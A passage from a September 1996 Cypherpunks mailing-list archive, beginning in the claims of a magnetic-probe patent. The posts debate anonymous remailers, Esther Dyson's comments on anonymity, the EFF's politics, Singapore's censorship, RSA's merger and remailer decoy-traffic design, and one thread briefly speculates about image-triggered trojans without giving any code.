recorded media with said magnetic probe a second time; (i) recording changes in position of said magnetic probe during said scanning of step (h) due to changes in the magnetic field of said magnetically recorded media; (j) positioning the tip of said magnetic probe to said magnetically recorded media at an angle in the range of zero degrees to pi/2 degrees but at an angle that is different than the angles used in step (d) and step (g) in order to establish said tunneling current; (k) scanning said recorded track of said magnetically recorded media with said magnetic probe a third time; (l) recording changes in position of said magnetic probe during said scanning of step (k) due to changes in the magnetic field of said magnetically recorded media; (m) combining the resulting three recordings of step (f), step (i), and step (l) linearly in order to obtain a single record of the position changes of said magnetic probe due to changes in the magnetic field of said magnetically recorded media; and (n) computing the magnetic fields associated with said combination of step (m) by using a mathematical equation that relates the position of said magnetic probe to the strength of the magnetic field. 6. The method of claim 5 further comprising the step of plating said magnetic probe and said magnetically recorded media with at least three-hundred angstroms of gold in order to reduce spurious probe deflection due to surface oxides on either said magnetic probe or said magnetically recorded media. 7. The method of claim 5 wherein said step of replacing the fine metallic tip of a scanning tunneling microscope with a flexible thin-film magnetic probe is accomplished by replacing the fine metallic tip of said scanning tunneling microscope with a thin-film nickel probe. 8. The method of claim 5 wherein said step of replacing the fine metallic tip of a scanning tunneling microscope with a flexible thin-film magnetic probe is accomplished by replacing the fine metallic tip of said scanning tunneling microscope with a thin-film iron probe. ************************************************************************ * Bruce Schneier 2,000,000,000,000,000,000,000,000,002,000, * Counterpane Systems 000,000,000,000,000,000,002,000,000,002,293 * schneier at counterpane.com The last prime number...alphabetically! * (612) 823-1098 Two vigintillion, two undecillion, two * 101 E Minnehaha Pkwy trillion, two thousand, two hundred and * Minneapolis, MN 55419 ninety three. ************************************************************************ From craiu at pcnet.pcnet.ro Tue Sep 3 04:31:12 1996 From: craiu at pcnet.pcnet.ro (Costin RAIU) Date: Tue, 3 Sep 1996 19:31:12 +0800 Subject: Message Digest Message-ID: <01BB9989.81517870@dial15.pcnet.ro> Hi, cypherpunks I'm interested in a 256 bits (or more) message digest algorithm (C source is better). Any URLs ? bye, c0s *-----------------------------------------------------------------------------* | Costin RAIU, D.S.E. (craiu at pcnet.pcnet.ro) | | UNIX++C, RAYTRACING, RAVE, anime and SF(ST) fan | | | | "Windows95 - Tomorrow's bugs, Today" | *-----------------------------------------------------------------------------* From jf_avon at citenet.net Tue Sep 3 04:42:45 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Tue, 3 Sep 1996 19:42:45 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age Message-ID: <9609030809.AB20606@cti02.citenet.net> On 2 Sep 96 at 11:46, Enzo Michelangeli wrote: > On Sun, 1 Sep 1996 ichudov at algebra.com wrote: > > James Seng wrote: > > > To understand the sitution better, you should not impose America > > > idealogy and perspection on how things to be done to Singapore. > > > Singapore maybe young but there are certain culture too. I agree with that. I should therefore cease, as much as possible, to interact with them by stopping to buy anything made in Singapore. Then, let them starve, fed by their highers cultural ideas. > > > Most importantly, the move to censor certain WWW site actually > > > comes as a relieve to many people, especially parents who > > > worried about the bad influence of it. We can go into the same > > > discussion about whose responsibilty it is but before you do > > > that, please bear in mind that this is Singapore. At whose moral expanse? > Of course, one may argue that the racial, social and religious > relations are better handled the American way. That, however, is a > controversial issue, and adopting confrontational cowboy attitudes > is not going to make the social evolution any faster. Who talks of social evolution? We only talk about civil liberties. And they are damn easy to implement: Leave your neighbor do what he pleases. Mind your own business. > IMHO, the present measures represent more a gesture of appeasement > to concerned social conservatives, not differently from the CDA in > the US, than an attempt to control the flow of information. This whole paragraph is a fine example of appeasement. And the CDA *is* an attempt to control the flow, not of information, but of ideas. jfa DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal JFA Technologies, R&D consultants: physicists, technologists and engineers. PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From stewarts at ix.netcom.com Tue Sep 3 05:52:55 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 3 Sep 1996 20:52:55 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609030930.CAA21885@toad.com> At 03:54 PM 9/2/96 -0700, someone purporting to be "Vladimir Z. Nuri" wrote: [EFF / Unicorn rant, deleted. ] >I also don't understand the anonymity fight by cpunks. it's the >wrong battle imho. ask any remailer operators how their services >are panning out. they will complain of the incessant spam and >increasing litigious pressure. I don't see any technological >solutions to these problems. if there were, they'd have been >invented now. As a former remailer operator who quit because of spam, and may restart when I can hack together a spam-reducing remailer, let me comment on this. We're only beginning to understand the technical questions for the parts of the problem that technology can do. One problem is that the technical definition of spam is "I'll know it when I see it", which is hard to write code for. And the definition of "offensive" is "one or more letters together, viewed by the appropriate reader", and remailers are good at finding that sort of reader. A lot of it is social, not technical. But improving blocking capabilities and news-cancel capabilities helps. And some problems are just _hard_ technically. Take 2-way remailers - encrypted reply blocks aren't perfect, because the system that handles them can decrypt them. Nymservers that depend on a different system supporting encrypted reply blocks help, because it forces Bad Guys to subvert two systems to identify the recipient, and you can chain that sort of thing to make it harder. But it's still tough, and that problem is fairly well-defined. Getting rid of vaguely-defined things is tougher. Mike Godwin has suggested that some of the major problems on the net are the results of "cheap speech". It's easy to send insults and hate email to people, nearly anonymously, nearly free, when only a few hostile people would bother doing it with paper mail, and most newspapers wouldn't print it. The News Media Establishment is threatened because anybody can broadcast anything they want to millions of people without spending millions of dollars for an artificially scarce TV channel that requires government permission to broadcast on. Readers are swamped because 25 million Internet users sending one line of text per day make 2 GB of Usenet/Web/Email, which is three or four orders of magnitude beyond what most people can actually read. Scale is tough, and problems that are half-solvable at one scale may be insolvable at the next order of magnitude. Anonymous remailers support several things I want to do, and that I want other people be able to do: 1) Let people have private conversations without being identified by third parties. 2) Let people have private conversations without being identified by each other, voluntarily and respecting each others' rights. 3) Let people broadcast things to the public that they might be afraid to do otherwise. 4) Let people broadcast things to the public without their reputations, good or bad, affecting readers' reactions. 5) Let people experiment with different personality and conversation styles, though this doesn't strictly require anonymity. 6) Let people communicate with government officials without risk. Not all of these things are always good; people can abuse them if they want, and one reason for experimenting with different kinds of remailers is to try to balance the good and bad that comes from facilitating those conversations. Technical capabilities of the remailer will affect how people use it; two-way-ness is a big win. I blocked president at whitehouse.gov on my remailer real early, though that's mainly because the government has this silly law against threatening the President. >let's face it, anonymity is a pain in the ass to support. >maybe there are other goals that are more crucial >that lie at the heart of anonymity. what cpunks are really >seaking is "assurance of freedom from retribution". when the >problem is phrased more openly like that, other solutions become >possible and worth consideration. An interesting formulation. While there are more issues than just preventing retribution, theft, and prejudice, that would be a good start. Unfortunately, the two approaches I can see to achieving it are 1) Have a perfect world with perfect people in it and perfect people running human-rights-respecting governments 2) Don't let them know your name. While there are groups that are working on bringing us closer to 1), or at least as far as "1a) Have a semi-tolerable world where the government doesn't harass you very much for what you say and doesn't single you out as a source of funds for their great plans", those folks have a long row to hoe. We can do something about 2). I'm happy to work on 1a) with people, though I won't see it in my lifetime, but you and I can work on 2) today, and accomplish something. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From hvdl at sequent.com Tue Sep 3 06:08:34 1996 From: hvdl at sequent.com (Hans Unicorn Van de Looy) Date: Tue, 3 Sep 1996 21:08:34 +0800 Subject: Passive Trojan (was:Re: HAZ-MAT virus) In-Reply-To: Message-ID: <9609030938.AA07849@amsqnt.nl.sequent.com> :: Request-Remailing-To: remailer at huge.cajones.com ## Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus) MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit :: Request-Remailing-To: remailer at remailer.nl.com ## Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus) MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit :: Request-Remailing-To: furballs at netcom.com (Paul S. Penrod) ## Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus) MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit The one-and-only Paul S. Penrod once stated: ! ! This has been done in the past using several vairants (but not in a image ! program). ! ! The key to the success is that the application in question has to be ! compromised to respond to these codes, either by design or by hacking. ! Either way the individual responsible must modify the execution ! mechanism, not just the data itself. ! ! Let's see -current examples of computing items with this kind of a ! "feature"... magic cookies, macros, OLE, DDE, MS Objects, JAVA, and the ! list keeps growing. And not to forget the future of virii. Modification of the BIOS of parts of the PC platform (motherboard, SCSI interfaces), or the firmware of drives. Since these building blocks are more and more equipped with flash-like PROMS which can be reprogrammed, they become a valid target for these kinds of programs. ! On Mon, 2 Sep 1996, Jason Wong wrote: ! ! > ! > Actually , THINK about it, it does makes a interesting idea for a trojan ! > horse doesn't it ? I mean, just get a solid graphic program, insert codes ! > into it so that when certain conditions, i.e. a particular gif or jpg file ! > is view, print, etc, the trojan activates !! ! > ___________________________________________________________________________ ! > ! > Jason Wong (CNE, MCP) Jason at MCSB.COM.SG ! > Network Engineer ! > MCSB Systems Pte Ltd ! > ___________________________________________________________________________ Deep Throat. From stewarts at ix.netcom.com Tue Sep 3 08:35:34 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 3 Sep 1996 23:35:34 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi Message-ID: <199609030830.BAA20001@toad.com> At 08:39 PM 9/2/96 -0800, Jim Bell (who else:-) wrote: >At the risk of sounding like a broken record (a phrase that will get ever >more obscure now that we're in the CD era...) that's why I pushing AP >(Assassination Politics.) In case anybody wonders why there _are_ relatively reasonable people like Esther Dyson who aren't happy with anonymity in spite of not liking the alternative of government control, this sort of thing _is_ one of the reasons :-) You CAN freak ALL the mundanes all the time, but it's not necessarily a good idea..... # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From jonl at well.com Tue Sep 3 08:45:48 1996 From: jonl at well.com (Jon Lebkowsky) Date: Tue, 3 Sep 1996 23:45:48 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960903115249.006e7bfc@mail.well.com> At 07:40 PM 9/2/96 -0400, Black Unicorn wrote: >> what *constructive* >> alternative to EFF do you propose? if you have none, please shut up. > >I think any organization that would apply political pressure rather than >bow to it would be an alternative. I think an organization in touch >enough with its own policy to prevent its staff and board from making >embarassing big brother type proposals to curtail the ability of any of us >to post without attributation would be an alternative. I think an >organization without the internal conflict and strife that has clearly >marred EFF in past and made it a laughable attempt at cohesive political >persuasion would be an alternative. I think an organization that had >official policies on the core issues which it proposes to influence would >be an alternative. > >In short, an organization that had even one of the needed elements of >legislative influence. (Cohesive, directed, persistent, and >uncompromising). "Uncompromising" is not an "element of legislative influence," at least not on this planet. -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From haystack at cow.net Tue Sep 3 09:05:00 1996 From: haystack at cow.net (Bovine Remailer) Date: Wed, 4 Sep 1996 00:05:00 +0800 Subject: Voting Monarchist? Message-ID: <9609031057.AA17091@cow.net> unicorn at schloss.li wrote: >I hate lightning it's pretty, but it can be nasty. most pretty things can. > Vote Monarchist who is the candidate? LaRouche? From jonl at well.com Tue Sep 3 09:41:36 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 00:41:36 +0800 Subject: POT_hot Message-ID: <2.2.32.19960903115927.006b2548@mail.well.com> At 11:50 PM 9/2/96 -0800, jim bell wrote: >At 11:39 PM 9/2/96 GMT, John Young wrote: >> Foreign Affairs, Sep/Oct, Lead Essay: >> >> "Postmodern Terrorism. The terrorism of the future may be >> far more destructive than terrorism as we have known it." >> >> An informative survey and pot-heat by Walter Laqueur. >> >> Terrorism's prospects, often overrated by the media, >> the public, and some politicians, are improving as its >> destructive potential increases. Terrorism has >> replaced wars between nations of the 1800s and 1900s. >[deleted] >> Why assassinate a politician or indiscriminately kill >> people when an attack on electronic switching will >> produce far more dramatic and lasting results? If the >> new terrorism directs its energies toward information >> warfare, its destructive power will be exponentially >> greater than any it wielded in the past -- greater >> even than it would be with biological and chemical >> weapons. The single successful one could claim many >> more victims, do more material damage, and unleash far >> greater panic than anything the world has yet >> experienced. >> http://jya.com/pothot.txt (30 kb) > > > >Am I being unreasonable to expect at least a certain degreee of logic in the >world? Why is it that this guy (Laqueur) seems to believe that the future >is filled with "greater panic than anything the world has yet experienced." >I believe that, while there may be panic, it'll be panic on the part of the >politicians, not ordinary citizens. I suppose a certain amount of bias is >to be expected, seeing as how it's Foreign Affairs magazine. A good representation of postmodern paranoia...the ingredients: a mind somewhat boggled by the extent of change (and the extent of awareness of change) occasioned by the 'information revolution,' a growing awareness of the fragile interdependence of control systems, and (this is the clincher) an inability to trust the intentions of the vast conspiratorial World Outside. -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From peter.allan at aeat.co.uk Tue Sep 3 10:22:45 1996 From: peter.allan at aeat.co.uk (Peter M Allan) Date: Wed, 4 Sep 1996 01:22:45 +0800 Subject: SNAKEOIL? Top Secret for Windows Message-ID: <9609031259.AA24982@clare.risley.aeat.co.uk> DJ> From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) DJ> Subject: SNAKEOIL? Top Secret for Windows DJ> http://www.simtel.net/pub/simtelnet/win3/security/tsecret.zip DJ> ftp://ftp.simtel.net/pub/simtelnet/win3/security/tsecret.zip 12070 bytes DJ> tsecret.zip TOPSECRET!: Easily encrypts any file DJ> TOPSECRET is a program to encrypt your sensitive files. ............ DJ> Shareware. Uploaded by the author. DJ> Siva Krishna DJ> sk510019 at mail.idt.net PA> I'm interested in reading the source PA> code and any more detailed description you have. SK> I am currently not releasing the source code.Here is a copy of the zip SK> file if you get hold of a pc. -- Peter Allan peter.allan at aeat.co.uk From hvdl at sequent.com Tue Sep 3 10:26:13 1996 From: hvdl at sequent.com (Hans Unicorn Van de Looy) Date: Wed, 4 Sep 1996 01:26:13 +0800 Subject: Passive Trojan (was:Re: HAZ-MAT virus) In-Reply-To: <9609030938.AA07849@amsqnt.nl.sequent.com> Message-ID: <9609031310.AA11046@amsqnt.nl.sequent.com> A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From froomkin at law.miami.edu Tue Sep 3 10:51:45 1996 From: froomkin at law.miami.edu (Michael Froomkin) Date: Wed, 4 Sep 1996 01:51:45 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi (fwd) Message-ID: Mike Godwin on E.Dyson: [please note that I'm just a conduit here; direct replies accordingly] ---------- Forwarded message ---------- Date: Tue, 3 Sep 1996 02:17:12 -0700 >From: Mike Godwin To: Michael Froomkin , Mike Godwin Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi (fwd) Esther had written: >Now, speaking personally: I believe there are trade-offs -- which is what I >told the LA Times. I assume I was quoted accurately (although the word >"enforce" is awkward), but out of context. Anonymity can be dangerous -- >as can traceability, especially in/by repressive regimes. Therefore I would >favor allowing anonymity -- with some form of traceability only under terms >considerably stronger than what are generally required for a wiretap. >Anyone who seriously needs anonymity because of a repressive government is >likely to use a foreign (outside whatever jurisdiction he fears) server, so >that this is not a matter of "local" laws. The tracer would have to pass >through what I hope would be tighter hoops than we have now. This is surely a reasonable statement for Esther to have made, even though connotatively it may seem to have an anti-anonymity thrust to it. Who can dispute that individual freedom (of any sort) entails the potential that someone will use that freedom badly, and that the greater the freedom the greater the theoretical potential for harm? The civil-libertarian argument can't be any naive denial of this sort of analysis -- instead, it has to something that acknowledges the truth of the principle, yet simultaneously denies the inference that the principle, standing alone, amounts to a case for limiting that freedom. One way to do so is to argue that the theoretical threat is outweighed by the benefits both to society and to individuals. Another is to point out that there seems to be no evidence that the theoretical problem has transmuted itself into a real one. You may feel free to forward this. --Mike ------------------------------------------------------------------------------- Law Professor Volokh Errs In Slate Article About Communications Decency Act. Set your browser to the following URL to read a critique of the Slate article by EFF's Mike Godwin and MIT's Hal Abelson: . Mike Godwin, EFF Staff Counsel, can be reached at mnemonic at eff.org or at his office, 510-548-3290. --------------------------------------------------------------------------- From proff at suburbia.net Tue Sep 3 11:13:22 1996 From: proff at suburbia.net (Julian Assange) Date: Wed, 4 Sep 1996 02:13:22 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <2.2.32.19960903115249.006e7bfc@mail.well.com> Message-ID: <199609031324.XAA30461@suburbia.net> > At 07:40 PM 9/2/96 -0400, Black Unicorn wrote: > >> what *constructive* > >> alternative to EFF do you propose? if you have none, please shut up. > > > >I think any organization that would apply political pressure rather than > >bow to it would be an alternative. I think an organization in touch > >enough with its own policy to prevent its staff and board from making > >embarassing big brother type proposals to curtail the ability of any of us > >to post without attributation would be an alternative. I think an > >organization without the internal conflict and strife that has clearly > >marred EFF in past and made it a laughable attempt at cohesive political > >persuasion would be an alternative. I think an organization that had > >official policies on the core issues which it proposes to influence would > >be an alternative. > > > >In short, an organization that had even one of the needed elements of > >legislative influence. (Cohesive, directed, persistent, and > >uncompromising). Certain members of the EFF board seem to be politically naive. The rational, intelligent lobbyist will always see both sides of the argument. Presenting both sides of the argument to the world at large is another matter altogether. You should only present both sides of the argument to the inner policy tactics personnel only in order to formulate policy and create defences for the weaknesses in your position. To the outside world only ever sees a united front. This is basic politics. The EFF is most certainly not the only speaker on the floor where this issue is concerned. There are some very powerful government interests who oppose anonymity in any form. For the EFF, who is viewed as normally opposing government regulation, to have it's spokes-person start shooting off her mouth and the EFF's previous position down publically before they even go into battle is political suicide. The claim of `I was just presenting my personal opinion on the matter' doesn't hold water. Dyson represents a political lobby group and has no "personal opinion" when talking publically about issues that concern the organisation she has been elected to represent. In the interview material I have seen Dyson talks about the EFF in the same context as the anonymity issue, and the reader understandably gains the impression that she is speaking on the behalf of the EFF, and I'm sure at the time Dyson and the interviewer thought she was too. Compromise is part of the legislative process, but it is something you do behind closed doors when the battle is concluded and each faction is counting the dead and starting to divide up territory. If you start the battle in a compromised position, expect to loose everything. Dyson, given her age and experience should be well aware of this, which is why I find her remarks unusual. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From julf at penet.fi Tue Sep 3 12:16:41 1996 From: julf at penet.fi (Johan Helsingius) Date: Wed, 4 Sep 1996 03:16:41 +0800 Subject: Educating former anon.penet.fi users about other remailers Message-ID: <1.5.4.32.19960903141834.0084bc34@pentu.penet.fi> >If somebody were to put together a one-page note on other remailers, >would it make sense to send it to all the penet.fi users? >A canonical cypherpunks approach would be to just write one and >send it to na000001 at anon.penet.fi ..... na600000 at anon.penet.fi, >but I assume either my system or Julf's would decide it was spam >and discard it (even if it were split up into 60,000 10-message chunks.) Yes, that�s what would happen. And I fear what woudl happen, load-wise, if I tried to send 700.000 messages. Might be a good idea to post it into the appropriate newsgroups, at least. Julf From preese at erinet.com Tue Sep 3 12:35:18 1996 From: preese at erinet.com (Paul Reese) Date: Wed, 4 Sep 1996 03:35:18 +0800 Subject: hackerlist Message-ID: <2.2.32.19960903111744.8c66f01c@erinet.com> At 08:51 AM 9/1/96 EDT, you wrote: Get a clue! Why on earth would you want a list like this and why on earth would anyone want to place themselves on such a list? Dumb idea! Proves the kind of clientel that Juno opens the doorways of Internet E-mail to.... >I am planning to make a list of hackers and would appreciatte it if you >would e-mail me with the following information. >handle >e-mail >city,state >url >whether or not you would like to recieve the list when finished > thanks for your help > P. Cummings > Patrickbc at juno.com > > Reply-To: preese at erinet.com From smith at sctc.com Tue Sep 3 12:52:17 1996 From: smith at sctc.com (Rick Smith) Date: Wed, 4 Sep 1996 03:52:17 +0800 Subject: Moscowchannel.com hack Message-ID: <199609031548.KAA04410@shade.sctc.com> : On Sat, 31 Aug 1996, Joel McNamara wrote: : > Just a matter of time before some builds a dedicated Satan type tool that : > scans for HTTP server holes or messed up file permissions to make locating : > potential victims easy. Snow replied: : Write your web site to a CD-ROM and hard-code the base directory into the : webserver. Or host it on something with mandatory access control protections. There are still a handful of us building such things, and they can give really good protection to web page contents. Rick. smith at sctc.com secure computing corporation From jamesd at echeque.com Tue Sep 3 13:45:14 1996 From: jamesd at echeque.com (James A. Donald) Date: Wed, 4 Sep 1996 04:45:14 +0800 Subject: The Esther Dyson Flap Message-ID: <199609031617.JAA01391@dns1.noc.best.net> At 08:11 PM 9/2/96 -0700, Timothy C. May wrote: > Esther Dyson says that anonymity on the Net can do more damage than > anonymity in other forums, and thus may need to be regulated and restricted > in various ways. > > [...] > > This is the "knife edge," or "fork in the road," I've long talked about. If > anonymity is outlawed, it will take draconian measures to enforce > it--citizen-unit ID cards, officially issued encryption keys, escrow, > monitoring of communications, massive penalties to deter illegal use of > encryption, and other police state measures. Esther Dyson has gone over to the enemy, she is chairman of the EFF, therefore the EFF has gone over to the enemy. > I don't call her our enemy. Perhaps she just hasn't thought things through > as deeply as many of us have. This seems unlikely. After all, it is her job. The net makes free speech more effective. Therefore the world must become more free, or else must suppress free speech, and thus become less free. Which side are you on? It is that simple. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Tue Sep 3 13:48:11 1996 From: jamesd at echeque.com (James A. Donald) Date: Wed, 4 Sep 1996 04:48:11 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609031557.IAA28466@dns1.noc.best.net> At 06:52 AM 9/3/96 -0500, Jon Lebkowsky wrote: > "Uncompromising" is not an "element of legislative influence," at least not > on this planet. Dead wrong: The pols always say "We would like your help in writing legislation, but if you want to contribute to the legislation you must accept reasonable compromise". But we do not want legislation, so we do not want to help write legislation. We want to delay legislation for as long as possible, for the longer the delay, the more the balance of power favors the net and disavors the pols. Therefore the correct strategy is simply to attack any politician who shows any interest in legislating on our issues. We have no friends on Capitol hill, and if we did have friends, it would still be necessary to denounce them as enemies. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From nobody at huge.cajones.com Tue Sep 3 14:01:34 1996 From: nobody at huge.cajones.com (Huge Cajones Remailer) Date: Wed, 4 Sep 1996 05:01:34 +0800 Subject: Free Speech and List Topics Message-ID: <199609031644.JAA08677@fat.doobie.com> qut at netcom.com (Dave Harman OBC) penned: >! At 5:17 AM 9/2/96, qut wrote: >No doubt the media is colluding for criminal purposes and >shady outfits like The New York Times should be seized and analysed >by Department Of Justice anti-trust invesigators. I never thought I'd say this, so I'm saying it through a remailer :) but please, skippy, don't vote Libertarian! From tcmay at got.net Tue Sep 3 14:15:52 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 05:15:52 +0800 Subject: Passive Trojan (was:Re: HAZ-MAT virus) Message-ID: At 9:38 AM 9/3/96, Hans "Unicorn" Van de Looy, aka "Deep Throat," wrote: >:: >Request-Remailing-To: remailer at huge.cajones.com .... >:: >Request-Remailing-To: remailer at remailer.nl.com .... >:: >Request-Remailing-To: furballs at netcom.com (Paul S. Penrod) > >Deep Throat. Hey, Hans, ya gotta watch those "Cc: cypherpunks at toad.com" lines! At least now we know who the _other_ "Unicorn" is. How's Sequent doing? Is Casey Powell still there? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From declan at well.com Tue Sep 3 14:17:46 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 4 Sep 1996 05:17:46 +0800 Subject: Flux in today's HotWired/Packet Message-ID: http://www.packet.com/flux/ The recently concluded merger of Security Dynamics Technologies Inc. with RSA Data Security Inc. may have offered us one of our last opportunities for insight into the bizarre and byzantine business world of commercial cryptography in America today. And one of the chief insights we've gleaned from Security Dynamics' filings with the Securities and Exchange Commission about the merger is that the company may have bought not only a lemon, but a lemon that, when swallowed, could make Security Dynamics double over with food poisoning. Why did Security Dynamics pay nearly US$300 million for RSA, a company which had less than $1 million in profit last year on revenue of some $11 million? Furthermore, its encryption patents will expire in four years, which means that all RSA really owns is its relationships with customers such as Netscape and Hewlett-Packard. Even worse, those patents are under attack at the moment through a lawsuit filed against RSA by Cylink Corporation, an RSA competitor holding similar patents that was a one-time partner in a failed joint venture with RSA. Another lawsuit pending against RSA, Security Dynamics, and Cylink was brought by Roger Schlafly, a cryptographic researcher who is attempting to invalidate any and all patents that might attempt to monopolize public key cryptography. Indeed, in a worst case scenario, what Security Dynamics may have purchased is a huge summary judgment (against itself) should Cylink actually prevail in its suits. According to Security Dynamics' recent S-4 filing with the SEC, "RSA has been advised that, in a letter to SDI following the announcement of the proposed merger, Cylink's general counsel asserted that Cylink's compensatory damages, conservatively estimated, would exceed $75,000,000 but provided no basis for such estimate." That's the kind of negative return on investment from an acquisition that we've come to expect from America Online (remember BookLink and WAIS Inc.?)! From pstira at escape.com Tue Sep 3 14:18:55 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 4 Sep 1996 05:18:55 +0800 Subject: What the NSA is patenting... In-Reply-To: Message-ID: On Tue, 3 Sep 1996, Bruce Schneier wrote: > I just spent a pleasant hour or so searching a patent database for all > patents assigned to the NSA. There's some interesting stuff: > > "Self-locking, tamper-evident package" > Method of retrieving documents that concern the same topic" > Oh Bruce, Bruce, Bruce, Say it ain't so -- the NSA is trying to patent the GUMMED ENVELOPE ???! *NOW* I have truly seen everything. -Millie. From tcmay at got.net Tue Sep 3 14:23:17 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 05:23:17 +0800 Subject: The Esther Dyson Flap Message-ID: At 1:40 PM 9/3/96, Chuck Thompson wrote: >"as a citizen" You seem to be qualifying your statement. Do you mean that >she should have her right to free speech taken or stifled as chairwoman? At No. I said nothing of the kind. When people speak of "don't you believe in her right to free speech?," I try to point out that this such a "right of free speech" is not the issue at hand. >the very least, it appears that several are demanding that she espouse a >particular point of view because she is the chairwoman of an organization >which, on the whole, is assumed to have a different viewpoint. It seems to No, I said nothing like this. She is obviously free to speak anything she wishes, as a citizen or as head of an organization. It is up to members (actually: _Board_ members, as EFF is not a grassroots, member-voting organization) to decide if her support for restricting anonymous speech is consistent with EFF directions. However, as I said, if the top spokesman at EFF gives indication of having views pretty much 180 degrees out of phase with our views, it's likely we'll speak up and oppose her (or him), and perhaps even suggest that other EFF board members look into the matter. "Free speech" is not even an issue. >>Well, many of us did not pounce. Speaking for myself, I strongly suspected >>that the newspaper article had summarized a more-nuanced point and had >>effectively taken just a convenient sound bite. > >And you are to be commended for not doing so. In fact, your response to my >message is exactly what I would expect.. a well-put statement of a contrary >opinion. Thanks. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From peter.allan at aeat.co.uk Tue Sep 3 14:24:01 1996 From: peter.allan at aeat.co.uk (Peter M Allan) Date: Wed, 4 Sep 1996 05:24:01 +0800 Subject: SRP (from the cutting-room floor) Message-ID: <9609031622.AA26229@clare.risley.aeat.co.uk> JAM> Rather than divert messages, then, I propose that for each input JAM> message there is a 10% chance that a piece of cover traffic is JAM> generated. AB> The way that this kind of attack is frustrated is that dummy messages AB> are created as cover traffic by the remailer, and that at some points AB> messages can be swallowed by a remailer as junk messages. Automatic decoy traffic was in my draft, but was not in the slimmed-down document I posted to CP. This was mainly because Lance Cottrell and I agreed on that bit, and thought it could be passed over. Unlike JAM, I was in favour of decoy traffic being _inversely_ related to genuine traffic. AB> You can still do a spamming attack by recognizing the destination, AB> rather than the message: Diversion was intended to make that harder too. Eve's messages won't all go straight where she wants them. They should turn up after some of them completed the diversion, but I suggested that would sometimes be too late to track it further through the chain. As for "messages can be swallowed by a remailer as junk messages", there's a catch for the unwary in that. See below. TCM> Note that merely fiddling around with probabilities of transmission, such TCM> as described above, will not be enough. This just adds a layer of noise, TCM> which will disappear under a correlation analysis. Kelsey wrote on 28th June about correlating messages at the points of entry & exit from the remailer network. I don't know what an attacker gains by correlating _inside_ the net. Here are the bits I omitted before. DECOY MESSAGES The sending of decoy messages by users is recommended, and serves to hide statistical correlations between your sending a message and somebody receiving one. This practice should continue. It is also desirable that a remailer be able to originate decoy messages itself. Advantages include better traffic load following. The remailer knows when traffic is light and can generate more decoys. This could be important at times of low traffic such as public holidays. It would be especially important during a denial-of-service attack. When an attacker prevents messages from reaching the remailer (in the hope of isolating a small number of target messages) a locally-produced set of decoys, immune from the denial-of-service, could be crucial. DESTINATION Addressing all automatic decoys 